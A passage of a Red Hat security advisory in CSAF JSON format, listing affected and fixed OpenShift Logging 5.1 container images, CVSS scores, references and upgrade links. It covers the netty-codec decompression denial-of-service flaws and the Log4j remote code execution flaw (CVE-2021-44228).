"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37136"
},
{
"category": "external",
"summary": "RHBZ#2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:09:12+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data"
},
{
"cve": "CVE-2021-37137",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004135"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37137"
},
{
"category": "external",
"summary": "RHBZ#2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:09:12+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
